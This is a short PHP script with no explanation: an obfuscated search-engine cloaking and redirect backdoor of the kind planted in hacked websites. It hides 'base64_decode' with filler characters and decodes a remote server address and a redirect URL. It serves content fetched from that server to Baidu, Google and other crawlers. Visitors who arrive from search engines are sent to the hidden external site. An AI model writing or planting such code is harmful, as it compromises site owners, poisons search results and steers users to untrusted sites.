error_reporting(0);set_time_limit(0);
header('Content-type: text/html; charset=gb2312');
$ua=@$_SERVER["HTTP_USER_AGENT"];
$rf=@$_SERVER['HTTP_REFERER'];
$tu='WVVoU01HTkViM1pNTTBKeVRHcG9NazFVWjNWWk1qbDBUSGM5UFE9PQ==';
$oki=str_replace('%','','%%b%a%%s%%e%%%%%%6%%%4%%%_%%%%d%%%e%c%%o%%%%%%d%%e%%%%%%%%');
$lt=$oki('aHR0cDovL3ZpbmJldDgzMC5jb20=');
for ($i = 0; $i < 3; $i++) {
     $tu=$oki($tu);}
if (ereg("baidu", $ua) || ereg("360Spider", $ua) || ereg("Sogou", $ua) || ereg("bing", $ua) || ereg("google", $ua) ) {
$Remote_server = $tu;
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=@file_get_contents($Remote_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);
echo $Content_mb;
exit;
}else if($rf!=''){
    if (ereg("baidu.com", $rf) || ereg("so.com", $rf) || ereg("haosou.com", $rf) || ereg("sogou.com", $rf) || ereg("bing.com", $rf) || ereg("google.com", $rf) ) {
        header("Location:".$lt);
    	exit;
    }
}